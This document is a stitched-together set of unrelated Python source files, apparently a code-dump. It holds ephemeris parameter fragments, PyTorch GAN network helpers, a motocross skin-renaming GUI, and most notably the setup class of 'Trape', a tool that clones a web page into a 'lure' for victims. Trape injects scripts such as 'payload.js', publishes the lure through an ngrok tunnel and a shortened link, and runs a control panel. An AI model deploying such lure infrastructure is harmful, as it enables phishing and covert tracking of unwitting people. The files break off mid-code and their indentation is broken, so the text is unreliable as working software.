# "eph_xquad1sign", "eph_xquad2sign", "eph_yquad1sign",
# "eph_yquad2sign", "eph_zquad1sign", "eph_zquad2sign"]
if args.eph_planetdelta:
if args.eph_planetmass:
if args.eph_planetmassprior == 'official':
            parameters += ["planet{0}_delta_mass".format(ii) for ii in
# Repository: yuweiliandrew/openrtist
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import init
import functools
from torch.optim import lr_scheduler
import numpy as np
from .stylegan_networks import StyleGAN2Discriminator, StyleGAN2Generator, TileStyleGAN2Discriminator
###############################################################################
# Helper Functions
###############################################################################
def get_filter(filt_size=3):
if(filt_size == 1):
a = np.array([1., ])
elif(filt_size == 2):
a = np.array([1., 1.])
elif(filt_size == 3):
a = np.array([1., 2., 1.])
elif(filt_size == 4):
a = np.array([1., 3., 3., 1.])
elif(filt_size == 5):
a = np.array([1., 4., 6., 4., 1.])
elif(filt_size == 6):
a = np.array([1., 5., 10., 10., 5., 1.])
elif(filt_size == 7):
        a = np.array([1., 6., 15., 20., 15., 6., 1.])
    else:
        raise NotImplementedError('filter size [%d] is not supported' % filt_size)
    filt = torch.Tensor(a[:, None] * a[None, :])
filt = filt / torch.sum(filt)
return filt
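# Example (illustrative): the default filt_size=3 yields the normalized
# binomial kernel
#   get_filter(3) == torch.Tensor([[1., 2., 1.],
#                                  [2., 4., 2.],
#                                  [1., 2., 1.]]) / 16.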
class Downsample(nn.Module):
def __init__(self, channels, pad_type='reflect', filt_size=3, stride=2, pad_off=0):
super(Downsample, self).__init__()
self.filt_size = filt_size
self.pad_off = pad_off
self.pad_sizes = [int(1. * (filt_size - 1) / 2), int(np.ceil(1. * (filt_size - 1) / 2)), int(1. * (filt_size - 1) / 2), int(np.ceil(1. * (filt_size - 1) / 2))]
self.pad_sizes = [pad_size + pad_off for pad_size in self.pad_sizes]
self.stride = stride
self.off = int((self.stride - 1) / 2.)
self.channels = channels
filt = get_filter(filt_size=self.filt_size)
self.register_buffer('filt', filt[None, None, :, :].repeat((self.channels, 1, 1, 1)))
self.pad = get_pad_layer(pad_type)(self.pad_sizes)
def forward(self, inp):
if(self.filt_size == 1):
if(self.pad_off == 0):
return inp[:, :, ::self.stride, ::self.stride]
else:
return self.pad(inp)[:, :, ::self.stride, ::self.stride]
else:
return F.conv2d(self.pad(inp), self.filt, stride=self.stride, groups=inp.shape[1])
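# Usage sketch (assumed shapes; mirrors the anti-aliased "BlurPool" idea of
# blurring with the binomial filter before subsampling):
#   blurpool = Downsample(channels=64, filt_size=3, stride=2)
#   y = blurpool(torch.randn(1, 64, 32, 32))   # y.shape == (1, 64, 16, 16)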
class Upsample2(nn.Module):
def __init__(self, scale_factor, mode='nearest'):
super().__init__()
self.factor = scale_factor
self.mode = mode
def forward(self, x):
return torch.nn.functional.interpolate(x, scale_factor=self.factor, mode=self.mode)
class Upsample(nn.Module):
def __init__(self, channels, pad_type='repl', filt_size=4, stride=2):
super(Upsample, self).__init__()
self.filt_size = filt_size
self.filt_odd = np.mod(filt_size, 2) == 1
self.pad_size = int((filt_size - 1) / 2)
self.stride = stride
self.off = int((self.stride - 1) / 2.)
self.channels = channels
filt = get_filter(filt_size=self.filt_size) * (stride**2)
self.register_buffer('filt', filt[None, None, :, :].repeat((self.channels, 1, 1, 1)))
self.pad = get_pad_layer(pad_type)([1, 1, 1, 1])
def forward(self, inp):
ret_val = F.conv_transpose2d(self.pad(inp), self.filt, stride=self.stride, padding=1 + self.pad_size, groups=inp.shape[1])[:, :, 1:, 1:]
if(self.filt_odd):
return ret_val
else:
return ret_val[:, :, :-1, :-1]
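# Usage sketch (assumed shapes): the transposed-convolution path doubles the
# spatial size with the same blur kernel, scaled by stride**2 to preserve
# overall magnitude:
#   up = Upsample(channels=64)                  # filt_size=4, stride=2
#   y = up(torch.randn(1, 64, 16, 16))          # y.shape == (1, 64, 32, 32)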
def get_pad_layer(pad_type):
if(pad_type in ['refl', 'reflect']):
PadLayer = nn.ReflectionPad2d
elif(pad_type in ['repl', 'replicate']):
PadLayer = nn.ReplicationPad2d
elif(pad_type == 'zero'):
PadLayer = nn.ZeroPad2d
    else:
        raise NotImplementedError('pad type [%s] is not recognized' % pad_type)
    return PadLayer
class Identity(nn.Module):
def forward(self, x):
return x
def get_norm_layer(norm_type='instance'):
"""Return a normalization layer
Parameters:
norm_type (str) -- the name of the normalization layer: batch | instance | none
For BatchNorm, we use learnable affine parameters and track running statistics (mean/stddev).
For InstanceNorm, we do not use learnable affine parameters. We do not track running statistics.
"""
if norm_type == 'batch':
norm_layer = functools.partial(nn.BatchNorm2d, affine=True, track_running_stats=True)
elif norm_type == 'instance':
norm_layer = functools.partial(nn.InstanceNorm2d, affine=False, track_running_stats=False)
elif norm_type == 'none':
def norm_layer(x):
return Identity()
else:
raise NotImplementedError('normalization layer [%s] is not found' % norm_type)
return norm_layer
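# Usage sketch (assumed): the returned callable is used wherever a layer
# constructor is expected, e.g.
#   norm_layer = get_norm_layer('instance')
#   block = nn.Sequential(nn.Conv2d(3, 64, 3, padding=1), norm_layer(64))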
def get_scheduler(optimizer, opt):
"""Return a learning rate scheduler
Parameters:
optimizer -- the optimizer of the network
opt (option class) -- stores all the experiment flags; needs to be a subclass of BaseOptions.
opt.lr_policy is the name of learning rate policy: linear | step | plateau | cosine
For 'linear', we keep the same learning rate for the first <opt.n_epochs> epochs
and linearly decay the rate to zero over the next <opt.n_epochs_decay> epochs.
For other schedulers (step, plateau, and cosine), we use the default PyTorch schedulers.
See https://pytorch.org/docs/stable/optim.html for more details.
"""
if opt.lr_policy == 'linear':
def lambda_rule(epoch):
lr_l = 1.0 - max(0, epoch + opt.epoch_count - opt.n_epochs) / float(opt.n_epochs_decay + 1)
return lr_l
scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda_rule)
elif opt.lr_policy == 'step':
scheduler = lr_scheduler.StepLR(optimizer, step_size=opt.lr_decay_iters, gamma=0.1)
elif opt.lr_policy == 'plateau':
scheduler = lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', factor=0.2, threshold=0.01, patience=5)
elif opt.lr_policy == 'cosine':
scheduler = lr_scheduler.CosineAnnealingLR(optimizer, T_max=opt.n_epochs, eta_min=0)
else:
return NotImplementedError('learning rate policy [%s] is not implemented', opt.lr_policy)
return scheduler
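# Illustrative numbers for the 'linear' policy (assumed opt: epoch_count=1,
# n_epochs=100, n_epochs_decay=100): lambda_rule returns 1.0 through epoch 99,
# then decays linearly, e.g. ~0.50 at epoch 149 and ~0.01 at epoch 199.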
def init_weights(net, init_type='normal', init_gain=0.02, debug=False):
"""Initialize network weights.
Parameters:
net (network) -- network to be initialized
init_type (str) -- the name of an initialization method: normal | xavier | kaiming | orthogonal
init_gain (float) -- scaling factor for normal, xavier and orthogonal.
We use 'normal' in the original pix2pix and CycleGAN paper. But xavier and kaiming might
work better for some applications. Feel free to try yourself.
"""
def init_func(m): # define the initialization function
classname = m.__class__.__name__
if hasattr(m, 'weight') and (classname.find('Conv') != -1 or classname.find('Linear') != -1):
if debug:
print(classname)
if init_type == 'normal':
init.normal_(m.weight.data, 0.0, init_gain)
elif init_type == 'xavier':
init.xavier_normal_(m.weight.data, gain=init_gain)
elif init_type == 'kaiming':
init.kaiming_normal_(m.weight.data, a=0, mode='fan_in')
elif init_type == 'orthogonal':
init.orthogonal_(m.weight.data, gain=init_gain)
else:
raise NotImplementedError('initialization method [%s] is not implemented' % init_type)
if hasattr(m, 'bias') and m.bias is not None:
init.constant_(m.bias.data, 0.0)
elif classname.find('BatchNorm2d') != -1: # BatchNorm Layer's weight is not a matrix; only normal distribution applies.
init.normal_(m.weight.data, 1.0, init_gain)
init.constant_(m.bias.data, 0.0)
net.apply(init_func) # apply the initialization function <init_func>
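# Usage sketch (assumed): conv/linear weights get the chosen init, norm layers
# get N(1.0, init_gain) weights and zero biases, e.g.
#   net = nn.Sequential(nn.Conv2d(3, 64, 3), nn.BatchNorm2d(64))
#   init_weights(net, init_type='xavier', init_gain=0.02)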
def init_net(net, init_type='normal', init_gain=0.02, gpu_ids=[], debug=False, initialize_weights=True):
"""Initialize a network: 1. register CPU/GPU device (with multi-GPU support); 2. initialize the network weights
Parameters:
net (network) -- the network to be initialized
init_type (str) -- the name of an initialization method: normal | xavier | kaiming | orthogonal
        init_gain (float)  -- scaling factor for normal, xavier and orthogonal.
gpu_ids (int list) -- which GPUs the network runs on: e.g., 0,1,2
Return an initialized network.
"""
if len(gpu_ids) > 0:
assert(torch.cuda.is_available())
net.to(gpu_ids[0])
# if not amp:
# net = torch.nn.DataParallel(net, gpu_ids) # multi-GPUs for non-AMP training
if initialize_weights:
init_weights(net, init_type, init_gain=init_gain, debug=debug)
return net
def define_G(input_nc, output_nc, ngf, netG, norm='batch', use_dropout=False, init_type='normal',
init_gain=0.02, no_antialias=False, no_antialias_up=False, gpu_ids=[], opt=None):
"""Create a generator
Parameters:
input_nc (int) -- the number of channels in input images
output_nc (int) -- the number of channels in output images
ngf (int) -- the number of filters in the last conv layer
netG (str) -- the architecture's name: resnet_9blocks | resnet_6blocks | unet_256 | unet_128
norm (str) -- the name of normalization layers used in the network: batch | instance | none
use_dropout (bool) -- if use dropout layers.
init_type (str) -- the name of our initialization method.
init_gain (float) -- scaling factor for normal, xavier and orthogonal.
gpu_ids (int list) -- which GPUs the network runs on: e.g., 0,1,2
Returns a generator
Our current implementation provides two types of generators:
U-Net: [unet_128] (for 128x128 input images) and [unet_256] (for 256x256 input images)
The original U-Net paper: https://arxiv.org/abs/1505.04597
Resnet-based generator: [resnet_6blocks] (with 6 Resnet blocks) and [resnet_9blocks] (with 9 Resnet blocks)
Resnet-based generator consists of several Resnet blocks between a few downsampling/upsampling operations.
We adapt Torch code from <NAME>'s neural style transfer project (https://github.com/jcjohnson/fast-neural-style).
The generator has been initialized by <init_net>. It uses RELU for non-linearity.
"""
net = None
norm_layer = get_norm_layer(norm_type=norm)
if netG == 'resnet_9blocks':
net = ResnetGenerator(input_nc, output_nc, ngf, norm_layer=norm_layer, use_dropout=use_dropout, no_antialias=no_antialias, no_antialias_up=no_antialias_up, n_blocks=9, opt=opt)
elif netG == 'resnet_6blocks':
net = ResnetGenerator(input_nc, output_nc, ngf, norm_layer=norm_layer, use_dropout=use_dropout, no_antialias=no_antialias, no_antialias_up=no_antialias_up, n_blocks=6, opt=opt)
elif netG == 'resnet_4blocks':
net = ResnetGenerator(input_nc, output_nc, ngf, norm_layer=norm_layer, use_dropout=use_dropout, no_antialias=no_antialias, no_antialias_up=no_antialias_up, n_blocks=4, opt=opt)
elif netG == 'unet_128':
net = UnetGenerator(input_nc, output_nc, 7, ngf, norm_layer=norm_layer, use_dropout=use_dropout)
elif netG == 'unet_256':
net = UnetGenerator(input_nc, output_nc, 8, ngf, norm_layer=norm_layer, use_dropout=use_dropout)
elif netG == 'stylegan2':
net = StyleGAN2Generator(input_nc, output_nc, ngf, use_dropout=use_dropout, opt=opt)
elif netG == 'smallstylegan2':
net = StyleGAN2Generator(input_nc, output_nc, ngf, use_dropout=use_dropout, n_blocks=2, opt=opt)
elif netG == 'resnet_cat':
n_blocks = 8
net = G_Resnet(input_nc, output_nc, opt.nz, num_downs=2, n_res=n_blocks - 4, ngf=ngf, norm='inst', nl_layer='relu')
else:
raise NotImplementedError('Generator model name [%s] is not recognized' % netG)
return init_net(net, init_type, init_gain, gpu_ids, initialize_weights=('stylegan2' not in netG))
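# Usage sketch (assumed; `opt` stands in for a parsed BaseOptions namespace):
#   netG = define_G(input_nc=3, output_nc=3, ngf=64, netG='resnet_9blocks',
#                   norm='instance', gpu_ids=[], opt=opt)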
def define_F(input_nc, netF, norm='batch', use_dropout=False, init_type='normal', init_gain=0.02, no_antialias=False, gpu_ids=[], opt=None):
if netF == 'global_pool':
net = PoolingF()
elif netF == 'reshape':
net = ReshapeF()
elif netF == 'sample':
net = PatchSampleF(use_mlp=False, init_type=init_type, init_gain=init_gain, gpu_ids=gpu_ids, nc=opt.netF_nc)
elif netF == 'mlp_sample':
net = PatchSampleF(use_mlp=True, init_type=init_type, init_gain=init_gain, gpu_ids=gpu_ids, nc=opt.netF_nc)
elif netF == 'strided_conv':
net = StridedConvF(init_type=init_type, init_gain=init_gain, gpu_ids=gpu_ids)
else:
raise NotImplementedError('projection model name [%s] is not recognized' % netF)
return init_net(net, init_type, init_gain, gpu_ids)
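# Usage sketch (assumed; 'mlp_sample' is the patch feature extractor, with
# opt.netF_nc giving the MLP width):
#   netF = define_F(input_nc=3, netF='mlp_sample', gpu_ids=[], opt=opt)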
def define_D(input_nc, ndf, netD, n_layers_D=3, norm='batch', init_type='normal', init_gain=0.02, no_antialias=False, gpu_ids=[], opt=None):
"""Create a discriminator
Parameters:
        input_nc (int)     -- the number of channels in input images
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#**
#
#########
# trape #
#########
#
# trape depends on this file
# For full copyright information visit: https://github.com/jofpin/trape
#
# Copyright 2018 by <NAME> (@jofpin) / <<EMAIL>>
#**
import time
import json
import urllib.request
from core.dependence import urllib2
import http.client
import argparse
import socket
import sys
import os
from core.utils import utils
import subprocess
import requests
import hashlib, binascii
from threading import Timer
from multiprocessing import Process
import atexit
class Trape(object):
def __init__(self, stat = 0):
self.name_trape = "Trape"
self.version = "2.1"
self.stats_path = "ngrok"
self.home_path = utils.generateToken(18)
self.logout_path = utils.generateToken(6)
self.remove_path = utils.generateToken(14)
self.injectURL = utils.generateToken(12) + '.js'
self.stats_key = utils.generateToken(24)
self.date_start = time.strftime("%Y-%m-%d - %H:%M:%S")
self.stat = stat
self.localIp = '127.0.0.1'
self.nGrokUrl = ''
        self.JSFiles = (
            {"path": "base.js", "src": utils.generateToken(12)},
            {"path": "libs.min.js", "src": utils.generateToken(12)},
            {"path": "login.js", "src": utils.generateToken(12)},
            {"path": "payload.js", "src": utils.generateToken(12)},
            {"path": "trape.js", "src": utils.generateToken(12)},
            {"path": "vscript.js", "src": utils.generateToken(12)},
            {"path": "custom.js", "src": utils.generateToken(12)},
        )
        self.CSSFiles = (
            {"path": "/static/img/favicon.ico", "src": utils.generateToken(12)},
            {"path": "/static/img/favicon.png", "src": utils.generateToken(12)},
            {"path": "/static/css/base-icons.css", "src": utils.generateToken(12)},
            {"path": "/static/css/styles.css", "src": utils.generateToken(12)},
            {"path": "/static/css/normalize.min.css", "src": utils.generateToken(12)},
            {"path": "/static/css/services-icons.css", "src": utils.generateToken(12)},
        )
if self.stat == 1:
c = http.client.HTTPConnection('www.google.com', timeout=5)
try:
c.request("HEAD", "/")
c.close()
except Exception as e:
c.close()
utils.Go("\033[H\033[J")
utils.Go(utils.Color['whiteBold'] + "[" + utils.Color['redBold'] + "x" + utils.Color['whiteBold'] + "]" + utils.Color['redBold'] + " " + "NOTICE: " + utils.Color['white'] + "Trape needs Internet connection for working" + "\n\t")
sys.exit(0)
if (not(os.path.exists("trape.config"))):
self.trape_config()
try:
config_trape = json.load(open("trape.config"))
except Exception as error:
os.remove('trape.config')
self.trape_config()
self.ngrok = config_trape['ngrok_token']
self.gmaps = config_trape['gmaps_api_key']
self.ipinfo = config_trape['ipinfo_api_key']
if self.gmaps == '':
self.gmaps = '<KEY>'
self.googl = config_trape['gshortener_api_key']
if self.googl == '':
self.googl = '<KEY>'
parser = argparse.ArgumentParser("python3 trape.py -u <<Url>> -p <<Port>>")
parser.add_argument('-u', '--url', dest='url', help='Put the web page url to clone')
parser.add_argument('-p', '--port', dest='port', help='Insert your port')
parser.add_argument('-ak', '--accesskey', dest='accesskey', help='Insert your custom key access')
parser.add_argument('-l', '--local', dest='local', help='Insert your home file')
parser.add_argument('-n', '--ngrok', dest='ngrok', help='Insert your ngrok Authtoken', action='store_true')
parser.add_argument('-ic', '--injectcode', dest='injc', help='Insert your custom REST API path')
parser.add_argument('-ud', '--update', dest='update', action='store_true', default=False, help='Update trape to the latest version')
options = parser.parse_args()
self.type_lure = 'global'
# Check current updates
if options.update:
utils.Go("\033[H\033[J")
utils.Go("Updating..." + " " + utils.Color['blue'] + "trape" + utils.Color['white'] + "..." + "\n")
subprocess.check_output(["git", "reset", "--hard", "origin/master"])
subprocess.check_output(["git", "pull"])
utils.Go("Trape Updated... Please execute again...")
sys.exit(0)
if options.url is None:
utils.Go("\033[H\033[J")
utils.Go("----------------------------------------------")
utils.Go("" + " " + utils.Color['redBold'] + "TRAPE" + utils.Color['white'] +" {" + utils.Color['yellowBold'] + "stable" + utils.Color['white'] + "}" + utils.Color['white'] + " - " + "Osint and analytics tool" + " " + "<" +utils.Color['white'])
utils.Go("----------------------------------------------")
utils.Go("| v" + utils.Color['redBold'] + self.version + utils.Color['white'] + " |")
utils.Go("--------" + "\n")
utils.Go(utils.Color['whiteBold'] + "[" + utils.Color['greenBold'] + "!" + utils.Color['whiteBold'] + "]" + " " + utils.Color['white'] + "Enter the information requested below to complete the execution" + utils.Color['white'])
utils.Go("")
options.url = input(utils.Color['blueBold'] + "-" + utils.Color['white'] + " Enter a URL to generate the lure" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
if options.port is None:
options.port = input(utils.Color['blueBold'] + "-" + utils.Color['white'] + " What is your port to generate the server?" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
while utils.checkPort(int(options.port)) == False:
utils.Go("\033[H\033[J")
utils.Go("----------------------------------------------")
utils.Go("" + " " + utils.Color['redBold'] + "TRAPE" + utils.Color['white'] +" {" + utils.Color['yellowBold'] + "stable" + utils.Color['white'] + "}" + utils.Color['white'] + " - " + "Osint and analytics tool" + " " + "<" +utils.Color['white'])
utils.Go("----------------------------------------------")
utils.Go("\n")
utils.Go(utils.Color['whiteBold'] + "[" + utils.Color['redBold'] + "x" + utils.Color['whiteBold'] + "]" + utils.Color['redBold'] + " " + "ERROR:" + " " + utils.Color['whiteBold'] + "The port: " + options.port + utils.Color['white'] + " " + "is not available, It was previously used (" + utils.Color['yellow'] + "Use another port" + utils.Text['end'] + ")" + "\n\n")
options.port = input(utils.Color['blueBold'] + "-" + utils.Color['white'] + " What is your port to generate the server?" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
        #while utils.checkUrl(str(options.url)) == False:
        #    options.url = input(utils.Color['blueBold'] + "-" + utils.Color['white'] + " Enter a URL to generate the lure" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
utils.Go("")
utils.Go(utils.Color['greenBold'] + "-" + utils.Color['white'] + " Successful " + utils.Color['greenBold'] + "startup" + utils.Color['white'] + ", get lucky on the way!" + utils.Color['white'])
utils.Go("")
time.sleep(0.1)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
self.localIp = s.getsockname()[0]
self.app_port = int(options.port)
self.url_to_clone = str(options.url)
if self.url_to_clone[0:4] != 'http':
self.url_to_clone = 'http://' + self.url_to_clone
self.victim_path = options.url.replace("http://", "").replace("https://", "")
if (options.ngrok or (self.ngrok != "")):
if self.ngrok == '':
utils.Go("\033[H\033[J")
self.ngrok = input("What is your nGrok token?" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
if (self.ngrok != ''):
from core.ngrok import ngrok
import os.path as path
v_ngrok = ngrok(self.ngrok, self.app_port, stat, self.stats_path)
else:
utils.Go(utils.Color['whiteBold'] + "[" + utils.Color['redBold'] + "x" + utils.Color['whiteBold'] + "]" + utils.Color['redBold'] + " " + "ERROR: " + " " + utils.Color['white'] + "Your nGrok authtoken can't be empty")
# Custom name of REST API
if (options.injc):
self.injectURL = options.injc
# Custom access token
if (options.accesskey):
self.stats_key = options.accesskey
    # Draws the main header of trape
def header(self):
if self.stat == 1:
# Principal header of tool
utils.banner()
# Update verification
changeLog = requests.get("https://raw.githubusercontent.com/jofpin/trape/master/version.txt", timeout = 4)
changeLog = changeLog.text.split(" ")[1]
changeLog = changeLog.strip()
if changeLog != self.version:
utils.Go(utils.Color['white'] + "\t" + utils.Color['yellowBold'] + "@" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "[" + utils.Color['whiteBold'] + " " + "UPDATES:" + " " + utils.Color['yellowBold'] + "NEW VERSION IS AVAILABLE: " + utils.Color['white'] + "v" + utils.Color['redBold'] + changeLog + utils.Color['white'] + " " + "(install changes)")
utils.Go("")
else:
utils.Go(utils.Color['white'] + "\t" + utils.Color['yellowBold'] + "@" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "[" + utils.Color['whiteBold'] + " " + "UPDATES:" + " " + utils.Color['greenBold'] + "RUNNING RECENT VERSION" + utils.Color['white'])
utils.Go("")
# Local information vars
utils.Go(utils.Color['white'] + "\t" + utils.Color['whiteBold'] + "LOCAL INFORMATION" + utils.Text['end'])
utils.Go("\t" + "-------------------")
utils.Go(utils.Color['white'] + "\t" + utils.Color['green'] + ">" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "[" + utils.Color['white'] + " Lure for the users: " + utils.Color['blue'] + 'http://' + self.localIp + ':' + str(self.app_port) + '/' + self.victim_path)
utils.Go(utils.Color['white'] + "\t" + utils.Color['green'] + ">" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "[" + utils.Color['white'] + " Your REST API path: " + utils.Color['blue'] + 'http://' + self.localIp + ':' + str(self.app_port) + '/' + self.injectURL + utils.Color['white'])
utils.Go(utils.Color['white'] + "\t" + utils.Color['green'] + ">" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "[" + utils.Color['white'] + " Control Panel Link: " + utils.Color['blue'] + "http://127.0.0.1:" + utils.Color['blue'] + str(self.app_port) + '/' + self.stats_path)
utils.Go(utils.Color['white'] + "\t" + utils.Color['green'] + ">" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "[" + utils.Color['white'] + " Your Access key: " + utils.Color['blue'] + self.stats_key + utils.Color['white'])
utils.Go("")
if self.ngrok != '':
if self.googl == '':
self.googl = 'AI<KEY>'
try:
opener = urllib.request.build_opener()
pLog = 4040
ngrokStatus = str(opener.open('http://127.0.0.1:' + str(pLog) + '/api/tunnels').read()).replace('\n', '').replace(' ', '')
time.sleep(0.5)
ngrokUrlPos = ngrokStatus.find('ngrok.io')
if ngrokUrlPos <= 0:
time.sleep(4)
ngrokStatus = str(opener.open('http://127.0.0.1:' + str(pLog) + '/api/tunnels').read()).replace('\n', '').replace(' ', '')
ngrokUrlPos = ngrokStatus.find('ngrok.io')
if ngrokUrlPos >= 0:
ngrokStatus = ngrokStatus[ngrokUrlPos-25:ngrokUrlPos+28]
ngrokUrlPos = ngrokStatus.find('http')
ngrokUrlPos2 = ngrokStatus.find('.io')
ngrokStatus = ngrokStatus[ngrokUrlPos: ngrokUrlPos2] + '.io'
utils.Go(utils.Color['white'] + "\t" + utils.Color['whiteBold'] + "PUBLIC INFORMATION" + utils.Text['end'])
utils.Go("\t" + "-------------------")
r = utils.gShortener(self.googl, ngrokStatus.replace('https', 'http') + '/' + self.victim_path)
self.nGrokUrl = ngrokStatus.replace('https', 'http')
utils.Go(utils.Color['white'] + "\t" + utils.Color['yellow'] + ">" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "[" + utils.Color['white'] + " Public lure: " + utils.Color['blue'] + self.nGrokUrl + '/' + self.victim_path + utils.Color['white'])
utils.Go(utils.Color['white'] + "\t" + utils.Color['yellow'] + ">" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "[" + utils.Color['white'] + " Control Panel link: " + utils.Color['blue'] + ngrokStatus.replace('https', 'http') + '/' + self.stats_path + utils.Color['white'])
else:
utils.Go(utils.Color['red'] + "\t" + utils.Color['green'] + "-" + utils.Color['white'] + "--" + utils.Color['red'] + "=" + utils.Color['white'] + "[" + utils.Color['white'] + " We can't connect with nGrok " + utils.Color['white'])
except Exception as e:
                    utils.Go(utils.Color['white'] + "[" + utils.Color['redBold'] + "x" + utils.Color['whiteBold'] + "]" + utils.Color['redBold'] + " " + "ERROR: " + " " + utils.Color['white'] + str(e))
utils.Go(utils.Color['red'] + "\t" + utils.Color['green'] + "-" + utils.Color['white'] + "--" + utils.Color['red'] + "=" + utils.Color['white'] + "[" + utils.Color['white'] + " We can't connect with nGrok " + utils.Color['white'])
utils.Go("\n" + utils.Color['white'])
utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] + ">" + utils.Color['white'] + "]" + utils.Color['whiteBold'] + " " + "Start time:" + " " + utils.Color['white'] + self.date_start)
            utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] + "?" + utils.Color['white'] + "]" + utils.Color['white'] + " " + "Do not forget to close
from tkinter import *
from tkinter import filedialog, messagebox
import os, shutil, subprocess
from os import listdir
from os import path
from os.path import isfile, join, splitext
import platform
root = Tk()
root.minsize(640, 640)
root.resizable(0, 0)
root.title("MXSkinNamer")
root.directory = None
dynosList = {"Honda (450f)": "crf450v2017", "Husqvarna (450f)": "fc450v2016",
"Kawasaki (450f)": "kx450fv2016", "KTM (450f)": "450sxfv2016", "Suzuki (450f)": "rmz450v2018",
"Yamaha (450f)": "yz450fv2014", "KTM (350f)": "350sxfv2016", "Honda (250f)": "crf250v2018",
"Husqvarna (250f)": "fc250v2016", "Kawasaki (250f)": "kx250fv2017", "KTM (250f)": "250sxfv2016",
"Suzuki (250f)": "rmz250v2010", "Yamaha (250f)": "yz250fv2014", "Honda (250t)": "cr250",
"Kawasaki (250t)": "kx250", "KTM (250t)": "250sx", "Suzuki (250t)": "rm250", "Yamaha (250t)": "yz250",
"Honda (125)": "cr125", "Kawasaki (125)": "kx125", "KTM (125)": "125sx", "Yamaha (125)": "yz125",
"Suzuki (125)": "rm125", "Rider Body": "rider_body", "Helmet": "rider_head", "Wheels": "wheels"}
jmParts = {"fork_lower", "fork_upper", "frame", "swingarm",
"side_plates", "front_plate", "rider_body", "rider_head", "wheels"}
def open_directory_browser():
root.directory = filedialog.askdirectory()
if not root.directory == "":
# Get files from directory
files = get_files_in_directory(root.directory)
if len(files[0]) > 0 or len(files[1]) > 0:
mapFiles = files[0]
jmFiles = files[1]
# Populate skins listbox
populate_listbox(skinsListbox, mapFiles)
# Populate jms listbox
populate_listbox(jmListbox, jmFiles)
# Show the user the working dir
currentWorkingDirectoryLabel["text"] = f"{root.directory}"
def get_files_in_directory(directory):
mapFiles = []
jmFiles = []
for f in listdir(directory):
        filepath = join(directory, f)
if isfile(filepath):
filename, extension = splitext(f)
if (extension == ".png"):
mapFiles.append(f)
elif (extension == ".jm"):
jmFiles.append(f)
return (mapFiles, jmFiles)
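# Usage sketch (hypothetical directory contents):
#   mapFiles, jmFiles = get_files_in_directory("/path/to/skin")
#   # mapFiles -> e.g. ["bike-norm.png", "bike-spec.png", "bike.png"]
#   # jmFiles  -> e.g. ["crf450v2017_frame.jm"]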
def populate_listbox(listbox, files):
# Delete all items in list box
clear_listbox(listbox)
# Insert file names into listbox
for f in files:
listbox.insert(END, f)
def clear_listbox(listbox):
listbox.delete(0, END)
def delete_item_skin_lb():
if skinsListbox.get(0):
selection = skinsListbox.curselection()
selectionList = []
for i in selection:
selectionList.append(skinsListbox.get(i))
for i in selection[::-1]:
skinsListbox.delete(i)
print(f"Removing {selectionList} from available skins and maps...")
else:
print("Skins listbox was empty...")
def delete_item_jm_lb():
if jmListbox.get(0):
selection = jmListbox.curselection()
selectionList = []
for i in selection:
selectionList.append(jmListbox.get(i))
for i in selection[::-1]:
jmListbox.delete(i)
print(f"Removing {selectionList} from available JMs...")
else:
print("JMs listbox was empty...")
def create_directory(directory, modelName):
rootDir = directory + f"/RenamedFiles/{modelName}"
jmDir = rootDir + "/JM"
mapsDir = rootDir + "/Maps"
rootDirExists = path.exists(rootDir)
mapsDirExists = path.exists(mapsDir)
jmDirExists = path.exists(jmDir)
if rootDirExists and mapsDirExists and jmDirExists:
return (rootDir, mapsDir, jmDir)
else:
if not rootDirExists:
os.makedirs(rootDir)
if not jmDirExists:
os.mkdir(jmDir)
if not mapsDirExists:
os.mkdir(mapsDir)
return (rootDir, mapsDir, jmDir)
def sort_maps():
normalMap = None
specMap = None
diffuseMaps = []
dynoSelection = dynoListbox.selection_get()
dynoValue = None
for item in dynosList:
if dynoSelection == item:
dynoValue = dynosList[dynoSelection]
if dynoValue != None:
maps = skinsListbox.get(0, END)
for i in range(0, len(maps)):
# Normal Map
if "norm" in maps[i] or "Norm" in maps[i]:
if messagebox.askyesno("Is this your normal map?", maps[i]):
normalMap = maps[i]
print(f"Normal map: {normalMap}")
else:
diffuseMaps.append(maps[i])
# Spec map
elif "spec" in maps[i] or "Spec" in maps[i]:
if messagebox.askyesno("Is this your specular map?", maps[i]):
specMap = maps[i]
print(f"Specular map: {specMap}")
else:
diffuseMaps.append(maps[i])
print(f"Diffuse map: {maps[i]}")
return (normalMap, specMap, diffuseMaps)
else:
print("The key supplied does not exist in the dynos dictionary...")
return None
def rename_all_files():
# Check to see if skins lb or jms lb has items in them
skinsLbPopulated = skinsListbox.get(0)
jmsLbPopulated = jmListbox.get(0)
if not skinsLbPopulated and not jmsLbPopulated:
print("You need to choose a directory that has skins or jms...")
return
# Check to see if the model name entry is blank
if modelNameEntry.get().lower() == "":
print("You need to supply a model name...")
return
# Check to see if a dyno is selected
if not dynoListbox.curselection():
print("You need to select a dyno...")
return
# Run the skin renaming
rename_map_files()
# Run the JM renaming
rename_jm_files()
def rename_map_files():
# Check to see if skins lb or jms lb has items in them
skinsLbPopulated = skinsListbox.get(0)
if not skinsLbPopulated:
print("You need to choose a directory that has skins...")
return
# Check to see if the model name entry is blank
if modelNameEntry.get().lower() == "":
print("You need to supply a model name...")
return
# Check to see if a dyno is selected
if not dynoListbox.curselection():
print("You need to select a dyno...")
return
# Get the sorted maps
